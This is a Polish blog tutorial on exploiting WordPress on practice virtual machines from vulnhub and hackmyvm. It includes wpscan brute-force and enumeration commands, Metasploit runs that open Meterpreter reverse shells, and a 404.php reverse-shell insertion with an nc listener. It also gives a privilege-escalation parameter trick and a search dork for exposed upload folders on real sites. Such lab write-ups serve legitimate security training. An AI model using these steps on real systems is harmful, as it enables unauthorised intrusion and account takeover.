Wstęp

Wordpress ma już prawie dwadzieścia lat (pierwsze wydanie było w 2003 roku). A co to jest? To chyba prawie każdy wie, kto się interesuje CMS-ami. Przypomnę, zaczerpnąwszy z definicji Wikipedii, że jest to system zarządzania treścią napisany w języku PHP korzystający z Bazy MySQL. Jest zaprojektowany głównie do obsługi blogów, ale nie tylko. PHP i MySQL od czasu do czasu łapią jakieś bugi, ale niekoniecznie to jest powodem jego słabości. Tutaj nie będę opisywał, jak zabezpieczyć Wordpressa, o tym możesz przeczytać w bardzo ciekawym artykule, który był parę lat temu opisywany na Sekuraku. Skupię się głównie na tym jak wykorzystać błędy Wordpressa na konkretnych maszynach wirtualnych. Wirtualki są z serwisów vulnhub i hackmyvm. Polecam zwłaszcza ten drugi serwis. Ciągle są dodawane nowe wirtualki. Głównie są one pod Linuxem. Praktycznie w każdej jest jakiś nowy pomysł na zdobycie flag. Czasami to aż głowa od tego pęka, a po fakcie myślisz, jakie to było proste. Za zdobycie konta użytkownika i roota jest punktacja. A jeżeli gdzieś utkniesz, to na Discordzie są osoby chętne do pomocy. Nie poprowadzą Ciebie za rączkę, ale możliwe, że dostaniesz jakąś wskazówkę. Poza tym większość maszyn ma solucje, a za napisanie też można dostać punkt. Nie musi być po angielsku. Dużo osób pisze w ojczystym języku: polskim, japońskim, hiszpańskim. A co jest dosyć ważne, wszystko jest za darmo.

Podstawy podstaw

O instalacji się będę rozpisywał, za to opiszę ogólnie konfigurację Wordpressa. Czyli co gdzie jest:

Główne katalogi

 • /var/www/html/ - Najczęściej główny katalog Wordpressa gdzie znajdują się główne pliki konfiguracyjne.
 • /var/www/html/wp-admin/ - pliki administracyjne, tam jest plik do logowania, pliki instalacyjne, zarządzające pulpitem Wordpressa. Możesz też wchodząc z przeglądarki na http://strona/wp-admin/wp-admin się od razu zalogować.
 • /usr/share/wordpress/wp-content/plugins - katalog z pluginami, jeżeli jakiś wtyczek nie używasz wyłącz.
 • /usr/share/wordpress/wp-content/uploads - Obrazy i multimedia. Bardzo niebezpieczny katalog. Często bywa, że po jest widoczny na zewnątrz, o tym będzie później.
 • /usr/share/wordpress/wp-content/themes - Tematy - podobnie jak w temacie pluginów, zostaw tylko ten temat, który używasz.
 • /usr/share/wordpress/wp-includes - Jest to jest folder, jak sama nazwa wskazuje, w którym wp-admin dołącza wszystkie pliki potrzebne do uruchomienia strony internetowej.

Podstawowowe podatności

wp-config.php

Ciekawym plikiem dla włamywacza jest /usr/share/wordpress/wp-config.php w którym widać hasło, login i nazwę bazy. Po włamaniu się przez Wordpressa możemy wejść na MySql. Poniżej fragment konfiguracji.

/usr/share/wordpress/wp-config.php

/** The name of the database for WordPress */ define( 'DB_NAME', 'baza' ); /** MySQL database username */ define( 'DB_USER', 'uzytkownik' ); /** MySQL database password */ define( 'DB_PASSWORD', 'haslo' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' );

/usr/share/wordpress/wp-content/uploads

Jeżeli nie zabezpieczyłeś tego katalogu, a tak było chyba w starszych Wordpressach, każdy z zewnątrz mógł przeglądać katalogi, wchodząc na https://strona/wp-content/uploads/. Takie strony łatwo można znaleźć wpisując w Google inurl:”/wp-content/uploads/” site:pl Jak to wygląda, możesz też zobaczyć opisie wirtualki. Vulny

Użytkownicy

Ciekawym katalogiem jest https://strona/wp-json/wp/v2/users/ oraz https://strona/author/[login]. Przykład możemy zobaczyć na stronie Sekuraka (mam nadzieje, że się nie obrażą na mnie za ten link, ale pewnie to świadomie udostępnili). Możemy również zobaczyć wpisy autora ac

Przydatne programy

To było sprawdzanie ręczne, ale od czego mamy programy? Znam dwa, ale polecam tylko jeden. Wpforce działał dosyć problemowo i nie jest aktualizowany tak jak Wpscan. Wybór jest oczywisty - ten drugi program. Warto się zarejestrować na stronie i ściągnąć sobie darmowy TOKEN. Dzięki temu możemy odczytać 25 darmowych żądań API dziennie, a to nam daje rozszerzoną informacje o skanowaniu. Oczywiście możemy tę liczbę zwiększyć, ale za to już dodatkowo się płaci. Bez TOKENa też możemy skanować, jednak wynik nie będzie tak dokładny.

Wpscan

Podczas skanowania stron internetowych trzeba uważać, żeby nie narobić szumu. Niektóre serwisy takie skanowanie odbierają jako próby ataku. Więc najprostszą rzeczą na początek będzie to:

# wpscan --url https://strona --stealthy --api-token=[twoj token]

Szukanie użytkowników już może narobić hałasu:

# wpscan --enumerate u --url https://strona --api-token=[twoj token]

Jeżeli znamy nazwę użytkownika i chcemy znaleźć jego hasło, możemy użyć brute-force:

# wpscan --url https://strona -U uzytkownik -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt --url https://strona --api-token=[twój token]

Ostatnia tutaj wspomniana komenda, czyli szukanie podatnych pluginów i tematów. To narobi dużo szumu. Przykład ten, a nawet mocniejszy możecie poćwiczyć na wirtualce Beloved.:

# wpscan --enumerate vp, vt --url https://strona --api-token=[twój token] 

Metasploit

W programie oprócz funkcji enumeracji Wordpressa mamy multum wtyczek. Na początek jednak enumeracja:

Enumeracja

Tak wygląda, niestety, żeby sprawdzić wszystkie pluginy i zajmuje to trochę czasu:

msf6 > use auxiliary/scanner/http/wordpress_scanner
msf6 auxiliary(scanner/http/wordpress_scanner) > show options

Module options (auxiliary/scanner/http/wordpress_scanner):

  Name     Current Setting          Required Description
  ----     ---------------          -------- -----------
  PLUGINS    true               no    Detect plugins
  PLUGINS_FILE /usr/share/metasploit-framework/ yes    File containing plugins to enumerate
         data/wordlists/wp-plugins.txt
  PROGRESS   1000               yes    how often to print progress
  Proxies                     no    A proxy chain of format type:host:port[,type:host:port][
                               ...]
  RHOSTS    172.16.1.214           yes    The target host(s), see https://github.com/rapid7/metasp
                               loit-framework/wiki/Using-Metasploit
  RPORT     80                yes    The target port (TCP)
  SSL      false               no    Negotiate SSL/TLS for outgoing connections
  TARGETURI   /                 yes    The base path to the wordpress application
  THEMES    true               no    Detect themes
  THEMES_FILE  /usr/share/metasploit-framework/ yes    File containing themes to enumerate
         data/wordlists/wp-themes.txt
  THREADS    1                 yes    The number of concurrent threads (max one per host)
  VHOST                      no    HTTP server virtual host

Shell

Dosyć ciekawym eksploitem jest wp_admin_shell_upload. Za jego pomocą możemy wejść na konsolę. Niestety trzeba mieć uprawnienia administratora, po to żeby stworzyć jakiś plugin. Na końcu opiszę, jak czasami możemy sobie zwiększyć uprawnienia.

msf6 auxiliary(scanner/http/wordpress_scanner) > use unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

  Name    Current Setting Required Description
  ----    --------------- -------- -----------
  PASSWORD          yes    The WordPress password to authenticate with
  Proxies           no    A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS           yes    The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   80        yes    The target port (TCP)
  SSL    false      no    Negotiate SSL/TLS for outgoing connections
  TARGETURI /        yes    The base path to the wordpress application
  USERNAME          yes    The WordPress username to authenticate with
  VHOST            no    HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

  Name  Current Setting Required Description
  ----  --------------- -------- -----------
  LHOST 172.16.1.10   yes    The listen address (an interface may be specified)
  LPORT 4444       yes    The listen port

Eksploity

wp_file_manager_rce

Ostatnio dosyć popularnym eksploitem (2020-09) jest WordPress File Manager Unauthenticated Remote Code Execution. Jest również dostępny w Metasploicie. Możesz go przetestować na już wcześniej wspomnianej wirtualce Vulny.

msf6 > use exploit/multi/http/wp_file_manager_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > show options

Module options (exploit/multi/http/wp_file_manager_rce):

  Name    Current Setting Required Description
  ----    --------------- -------- -----------
  COMMAND  upload      yes    elFinder commands used to exploit the vulnerability (Accepted: upload, mkfil
                     e+put)
  Proxies           no    A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS   172.16.1.159   yes    The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/
                     Using-Metasploit
  RPORT   80        yes    The target port (TCP)
  SSL    false      no    Negotiate SSL/TLS for outgoing connections
  TARGETURI /        yes    Base path to WordPress installation
  VHOST            no    HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

  Name  Current Setting Required Description
  ----  --------------- -------- -----------
  LHOST          yes    The listen address (an interface may be specified)
  LPORT 4444       yes    The listen port


Exploit target:

  Id Name
  -- ----
  0  WordPress File Manager 6.0-6.8 

wp_wpdiscuz_unauthenticated_file_upload

Zastowowanie tego pluginu znajdziesz w Beloved. Poniżej przykład użycia.

msf6 > use exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set BLOGPATH /2021/06/09/hello-world/
BLOGPATH => /2021/06/09/hello-world/
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set rhosts 172.16.1.200
rhosts => 172.16.1.200
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set lhost eth0
lhost => eth0
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > run

[*] Started reverse TCP handler on 172.16.1.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Payload uploaded as oRmLwLOvrhs.php
[*] Calling payload...
[*] Sending stage (39282 bytes) to 172.16.1.200
[*] Meterpreter session 1 opened (172.16.1.10:4444 -> 172.16.1.200:34720) at 2021-09-30 11:00:35 +0200


[!] This exploit may require manual cleanup of 'oRmLwLOvrhs.php' on the target

wp_plainview_activity_monitor_rce

To już dosyć stary plugin, ale pewnie jak poszukasz to go gdzieś znajdziesz w Internecie. Przykład użycia znajdziesz w Dc6.

404.php

Jeżeli mamy możliwość edycji pliku 404.php, to możemy wstawić tam eksploita. Wchodzimy na http://strona/wp-admin/, dalej tematy http://172.16.1.109/wp-admin/theme-editor.php i wrzucamy do 404.php po edycji eksploita z pentestmonkey. Na naszym serwerze uruchamiamy nasłuchiwacza komendą nc -lvnp 1234, a na Wordpressie odpalamy jakąś stronę której nie ma, np. http://strona/?p=1234. Możesz to przećwiczyć na colddbox-easy. Solucje znajdziesz tu

Zwiększanie uprawnień użytkownika

Jeżeli zalogowaliśmy się na jakieś konto (nie admina) i chcemy sobie zwiększyć uprawnienia, to czasami udaje się pewna sztuczka. Do niej użyjemy programu Burp Suite https://portswigger.net/burp. W Wordpressie zaś wchodzimy na users->”your profile”->”update profile”. Przechwytujemy zapytanie nagłówka POST /wp-admin/profile.php HTTP/1.1 i dodajemy na koniec &ure_other_roles=administrator. Było to sprawdzane ne Wordpressie w wersji 5.1.1 i 5.8.1. Poniżej przykładowe obrazki z tej akcji:

Koniec

W miarę możliwości będę aktualizować ten wpis. A Jeżeli znalazłe(a)ś jakieś błędy lub znasz ciekawe podatności Wordpressa napisz mejla na kerszi@protonmail.com. Ciekawe pomysły tutaj zamieszczę.

Zostaw komentarz